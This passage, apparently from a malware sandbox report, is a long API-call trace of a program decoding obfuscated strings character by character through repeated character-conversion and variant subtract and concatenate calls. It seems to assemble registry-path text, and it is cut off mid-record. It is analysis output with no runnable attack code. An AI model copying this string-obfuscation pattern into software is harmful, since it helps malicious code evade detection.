dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.169] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.169] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.268] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.268] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.269] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.269] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.269] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.270] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0167.270] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.271] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.271] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.271] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.272] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.272] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0167.272] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.273] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.273] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.274] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.274] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.275] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="B", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0167.275] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.276] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.276] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.276] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.277] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.277] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.278] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.278] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0167.279] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="<", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="<\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.282] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0167.283] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.283] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.283] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.284] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0167.285] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.285] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0167.285] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.286] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.286] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.287] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0167.287] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.288] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0167.288] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.288] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.289] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.289] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0167.289] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.290] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.290] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.291] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.291] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.292] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.292] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.293] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0167.293] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.294] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0167.294] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.298] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0167.298] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.298] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="U") returned 1 [0167.299] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.299] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.299] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.300] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.300] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.301] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0167.301] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.302] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.302] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.302] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.303] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.303] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.304] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", 